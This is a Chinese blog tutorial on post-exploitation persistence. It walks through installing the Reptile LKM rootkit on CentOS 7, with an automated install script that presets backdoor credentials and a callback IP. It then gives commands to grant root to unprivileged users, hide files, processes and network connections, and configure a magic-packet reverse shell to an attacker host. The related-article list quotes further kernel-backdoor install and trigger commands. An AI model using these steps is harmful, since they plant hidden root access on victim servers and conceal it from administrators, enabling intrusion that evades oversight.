权限维持-Linux-内核加载 LKM-Rootkit 后门

最新推荐文章于 2024-09-07 09:06:15 发布
最新推荐文章于 2024-09-07 09:06:15 发布
阅读量1.1k 收藏 6
点赞数 27
分类专栏: # 权限维持 文章标签: linux 运维 服务器 网络安全 安全 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/140274524
版权

免责声明:本文仅做技术交流与学习...

目录

权限维持-Linux-内核加载 LKM-Rootkit 后门

项目地址:

安装:

隐藏用法:

将 root 权限授予非特权用户

隐藏文件、目录和内核模块

隐藏进程

隐藏 TCP 和 UDP 连接

高级玩法(c/s)

攻击机上(客户端)安装:

设置连接配置

权限维持-Linux-内核加载 LKM-Rootkit 后门

现在常用的linux维持权限的方法大多用crontab和开机自启动,同时使用的大多是msf或者其它的tcp连接来反弹shell,这种做法比较容易被管理员发现。 所以我们想有一个非tcp连接、流量不容易被怀疑的后门,并且在大量的shell的场景下,可以管shell,Reptile刚好是种LKM rootkit,因此具有很好的隐藏性和强大的功能。

项目地址:

GitHub - f0rb1dd3n/Reptile: LKM Linux rootkit

建议在其测试成功的版本型号上去安装

本文演示的为centos7 Cent0S7.764位 --------->

安装:

1-本地从项目下载好zip,然后解压,将解压后的文件放到centos的~目录,

2-在centos终端~目录创建s.sh,内容为:

centos自动化一键安装搭建------->

$kernel=`uname -r`
yum -y install perl vim gcc make g++ unzip
yum -y localinstall kernel-devel-"$kernal".rpm
cd Reptile-2.0/ && chmod +x ./setup.sh
./setup.sh install <<EOF
reptile
hax0r   
s3cr3t  
reptile
666
y
服务器IP   
端口          
1
EOF

 

--成功--

隐藏用法:

这里我们在自动化部署的时候隐藏了此目录(reptile),所以直接盲打就行.

将 root 权限授予非特权用户

/reptile/reptile_cmd root

隐藏文件、目录和内核模块

/reptile/reptile_cmd hide
/reptile/reptile_cmd show
============================
隐藏文件:文件名中带reptile的都会被隐藏.
mkdir reptile_xiaodi
mkdir reptile_file
看不到,但是可以cd进去.
ls -l
cd reptile_xiaodi

隐藏进程

/reptile/reptile_cmd hide <pid>
/reptile/reptile_cmd show <pid>
===================================
隐藏进程:/reptile/reptile_cmd hide
显示进程:/reptile/reptile_cmd show 

nohup ping 114.114.114.114 &
ps -ef | grep ping | grep -v grep
/reptile/reptile_cmd hide 4774
ps -ef | grep ping | grep -v grep

 

 

隐藏 TCP 和 UDP 连接
 

/reptile/reptile_cmd conn <IP> hide
​
/reptile/reptile_cmd conn <IP> show
=========
隐藏连接:/reptile/reptile_cmd udp hide
显示连接:/reptile/reptile_cmd tcp show
netstat -anpt | grep 1100.100.45.106
/reptile/reptile_cmd tcp 100.100.45.106 443 hide
/reptile/reptile_cmd tcp 100.100.45.106 443 show
 

 

外连地址+端口:
 

 

隐藏IP进程:
 

 

 

高级玩法(c/s)
 

攻击机上(客户端)安装:
 

./setup.sh client
--进入bin目录,  启动~客户端终端
help
show
 

 

设置连接配置
 

LHOST       47.94.236.117       Local host to receive the shell
LPORT       4444    Local       port to receive the shell
SRCHOST     47.94.236.117       Source host on magic packets (spoof)
SRCPORT     666                 Source port on magic packets (only for TCP/UDP)
RHOST       121.43.154.113      Remote host(受害主机IP)
RPORT       22                  Remote port (only for TCP/UDP)  --冒充ssh协议的端口,封装(类似进程注入)
PROT        TCP                 Protocol to send magic packet (ICMP/TCP/UDP)
PASS        s3cr3t              Backdoor password (optional)
TOKEN       hax0r               Token to trigger the shell
 

​
----这里的配置都要指向靶机安装的!!!!!!
 

set xxx xxxxxx
===============
LHOST47.94.236.117Local host to receive the shell
LPORT4444Local port to receive the shell
SRCHOST47.94.236.117Source host on magic packets (spoof)
SRCPORT666Source port on magic packets(only for TCP/UDP)
RHOST121.43.154.113Remote host
RPORT22Remote port (only for TCP/UDP)
PROTTCPProtocol to send magic packet (ICMP/TCP/UDP)
PASSs3cr3tBackdoor password (optional)
TOKENhax0rToken to trigger the shell
 

 


                

        

        

    

  


            

                    
            

    

      

        

            

              
                
                  金灰
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
权限维持——Linux-Crontab&Strace&Alias&Rootkit

				
			

			

				

					m0_61506558的博客
				

				

					03-04
					
					804
					
				

			

		

		

			
				
alias命令的功能:为命令设置别名定义: alias ls = 'ls -al'删除: unalias ls即每次输入ls命令的时候都能实现ls -al。隐藏连接: /reptile/reptile_ cmd udp hide显示连接: /reptipe/reptile_ cmd tcp show

			
		

	



                

            
              



	

		

			

				
					
全志的 Linux 内核后门分析

				
			

			

				

					rock lee
				

				

					05-16
					
					2143
					
				

			

		

		

			
				
全志kernel后门分析最近全志开发人员在其kernel中留下后门一事闹得沸沸扬扬。还不知道的同学请参看http://www.cnbeta.com/articles/501193.htm。本人将全志的这个后门移植到了raspberry pi 3的4.6内核,试了一下,确实好用。有兴趣的同学可以玩玩。下面是我修改过的代码。将其编译成模块,使用root插入这个模块后,任意一个用户执行echo “root

			
		

	



              


  
              

                


	

		

			

				
					
Linux内核后门的原理及简单实战应用(转)

				
			

			

				

					csd3176的博客
				

				

					08-10
					
					177
					
				

			

		

		

			
				
Linux内核后门的原理及简单实战应用(转)[@more@]
  以下代码均在linux i86 2.0.x的内核下面测试通过。它也许可以在之前的版本通过,但并没有被测试过。因为从2.1.x内核版本就引入了相当大的改变,显著...

			
		

	





	

		

			

				
					
LKM Rootkit 项目教程

					
最新发布

				
			

			

				

					gitblog_00315的博客
				

				

					09-07
					
					288
					
				

			

		

		

			
				
LKM Rootkit 项目教程
 lkm-rootkitA LKM rootkit for most newer kernel versions.项目地址:https://gitcode.com/gh_mirrors/lk/lkm-rootkit 1. 项目介绍
LKM Rootkit 是一个用于大多数现代内核版本的可加载内核模块(LKMrootkit。该项目的主要目的是通过LKM技术扩展Li...

			
		

	



		

			
		



	

		

			

				
					
Linux内核后门

				
			

			

				

					哈兜King
				

				

					02-09
					
					783
					
				

			

		

		

			
				
if((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;    像不像wait4函数,正常情况下没有任何影响,但是如果调用程序故意传入非法值,if表达式的第二部分就会执行。该部分会将程序的用户ID(current->uid)设为0,在Linux中就是root用户。

			
		

	





	

		

			

				
					
关于Linux内核后门的原理和简单实战

					
热门推荐

				
			

			

				

					CSDN_document的专栏
				

				

					07-11
					
					1万+
					
				

			

		

		

			
				
      作者:中华补天网用户空间与内核空间linux是一个具有保护模式的操作系统。它一直工作在i386 cpu的保护模式之下。内存被分为两个单元: 内核区域和用户区域。(译者注:我觉得还是这样叫比较顺口)内核区域存放并运行着核心代码,当然,顾名思义,用户区域也存放并运行用户程序。当然,作为用户进程来讲它是不能访问内核区域内存空间以及其他用户进程的地址空间的。     不幸地是, 核心进程也有同

			
		

	





	

		

			

				
					
linux 内核 后门,一个简单的Linux内核后门原型(ZT)

				
			

			

				

					weixin_35336727的博客
				

				

					04-30
					
					178
					
				

			

		

		

			
				
作者:wzt 这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵/** Kernel mode connect backdoor,haha~** just a demo module to teach you how to write a backdoor in kernel mode,* i belive you can add more code to make ...

			
		

	





	

		

			

				
					
后门技术和Linux LKM Rootkit详细解析

				
			

			

				

					03-04
				

			

		

		

			
				
在本篇文章里, 我们将看到各种不同的后门技术,特别是Linux的可装载内核模块(LKM)。 我们将会发现LKM后门比传统的后门程序更加复杂,更加强大,更不易于被发现。知道这些之后,我们可以制造我们自己的基于LKM的...

			
		

	





	

		

			

				
					
Rootkit-LKM编程劫持系统调用,隐藏后门程序backdoor(ps,ls)

				
			

			

				

					bw_yyziq的博客
				

				

					11-05
					
					4288
					
				

			

		

		

			
				
前言最近学习到rootkit,由于之前没怎么接触到Linux内核,系统调用具体实现这些稍底层的东西,并且参考的许多代码都是基于内核2.6的又不想重装低版本系统,所以踩了很多坑浪费了很多时间,查了许多资料,掉了许多头发,现稍整理希望能给后面采坑的人提供一点思路。
环境: 
Ubuntu 16.04 
linux内核版本 4.10.0-37

			
		

	





	

		

			

				
					
Linux安全-Linux 安全检测器的设计与实现

				
			

			

				

					03-18
				

			

		

		

			
				
LKM后门工具通过利用Linux的模块化特性,能够在不重新编译整个内核的情况下修改内核行为,实现隐蔽运行、隐藏文件、进程、网络连接等功能,从而为黑客提供了一个隐秘的操作平台。KnarkRootkit和Adore Rootkit便是...

			
		

	





	

		

			

				
					
kopycat:Linux内核无模块植入(后门

				
			

			

				

					03-05
				

			

		

		

			
				
0
 KOPYCAT-Linux内核模块的植入程序(后门)
用法
$ make
$ sudo insmod kopycat.ko
insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device
$ lsmod | grep kopycat
$ cat /proc/modules | grep kopycat
启动nc侦听器:
 $ nc -l 6666
通过发送带有秘密短语的ICMP数据包来触发后门:
 $ sudo hping3 -c 1 -j -1 -e black-wives-are-fatter 127.0.0.1
作者
 2021年

			
		

	





	

		

			

				
					
lkm-rootkit:作为 linux 内核模块实现的 rootkit

				
			

			

				

					06-08
				

			

		

		

			
				
lkm-rootkit
 作为 linux 内核模块实现的 rootkit
 ##Syscall 表:###NOTICE:此内核模块仅与 64 位 PC 兼容。 如果您的 PC 是 32 位,请不要运行。
加载rootkit”模块: 
 make -f Makefile
sudo insmod rootkit.ko
dmesg | tail
要移除模块: 
 sudo rmmod rootkit
为了能够获得root访问权限: 
 After loading the module, Invoke the write function with the last
parameter (the count) passed as -1
为了能够隐藏端口: 
 After loading the module, Isssue the following command
echo "hp PORT

			
		

	





	

		

			

				
					
lkm-rootkit:lkm Rootkit 支持 x8664、arm、mips

				
			

			

				

					07-04
				

			

		

		

			
				
lkm-rootkit
an lkm rootkit support x86/64,arm,mips
支持 kernel version 2.6 及 3.x ,
支持 x86, x86_64, arm, mips 平台,
支持进程隐藏、进程免杀(root 无法 kill)
支持文件隐藏、文件免杀(root 无法修改、删除)
支持tcpv4/v6端口隐藏、udpv4/v6端口隐藏
支持模块本身隐藏
支持提权
支持应用层接口下发执行功能的命令
源码主体源于国外一位大牛写的 suterusu 项目。
本人在此基础上添加了mips架构的支持,以及进程免杀、文件免杀等功能。

			
		

	





	

		

			

				
					
LKMrootkitWukong.zip

				
			

			

				

					07-19
				

			

		

		

			
				
Rootkit 是隐者,负责隐身,它是由二进制代码、脚本和配置文件组成的一套工具,能够使用它隐秘地保持对计算机的访问权限,以便在不引起系统管理员注意的情况下发布命令、搜索数据。Wukong是一套开源的、运行在Linux平台上的LKM rootkit,主要功能如下:1. 隐藏Linux进程。2. 隐藏TCP连接。3. 隐藏文件和目录。4. 隐藏LKM自身。5. 通过特殊的口令,建立与Backdoor之间的TCP连接。Enjoy Hacking!
                        
                        
                            标签:Wukong

			
		

	





	

		

			

				
					
Linux内核模块入门之简单内核后门

				
			

			

				

					m0_73494896的博客
				

				

					09-03
					
					1124
					
				

			

		

		

			
				
Linux内核支持运行时动态扩展,即运行时动态加载内核扩展模块(.ko文件),ko文件所包含的代码经加载后即成为内核代码的一部分,拥有内核特权,可以调用内核其它组件,访问内核空间数据以及操作硬件。当然也有跟内核代码一样的限制,如较小的函数调用栈,不支持浮点运算等。此外,由于众所周知的原因,开发内核模块,只能使用C语言。

			
		

	





	

		

			

				
					
linux内核启动后门,Linux下编写隐蔽的自启动回连后门

				
			

			

				

					weixin_35683252的博客
				

				

					04-30
					
					324
					
				

			

		

		

			
				
一直很想补充LKM方式未实现的ROOTKIT后门功能,奈何内核模式下虽然权限很高,但编程难度也很大。在网络安全技术中用户级程序虽然权限不高,但是编程相对简单,兼容性好。所以一般ROOTKIT也不是全部在内核中完成的,也要编写用户级的程序来辅助。本文将讲述回连后门的编写和在Linux下隐蔽地自启动的方法。回连后门的编写很容易实现,在一个典型的Socket客户端的基础上,将标准输入输出重定向到Soc...

			
		

	





	

		

			

				
					
【转载】全志的 Linux 内核后门分析

				
			

			

				

					seiyaaa的专栏
				

				

					03-22
					
					424
					
				

			

		

		

			
				
据外媒 arstechnica 报道,一家中国的芯片级系统厂商全志(allwinner) 在其开发的产品中携带的内核里遗留了一个 root 后门。该公司使用的内核 linux-3.4-sunxi,原先用于支持全志的 ARM 芯片平板上的 Android,它也有一个社区版本。本人将全志的这个后门移植到了raspberry pi 3的4.6内核,试了一下,确实好用。通过写入rootmydevice到/proc/sunxi-debug/sunxi-debug,一个普通用户就能拥有root权限

			
		

	





	

		

			

				
					
LKM rootkit:Reptile学习

				
			

			

				

					weixin_30485799的博客
				

				

					06-07
					
					1100
					
				

			

		

		

			
				
简介
Reptile是github上一个很火的linux lkm rootkit,最近学习了一些linux rootkit的内容,在这里记录一下。
主要是分析reptile的实现
Reptile的使用
安装命令:

sudo ./setup.sh install

然后执行下面的命令

/reptile/reptile_cmd show

接着就可以看到/rept...

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
金灰

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值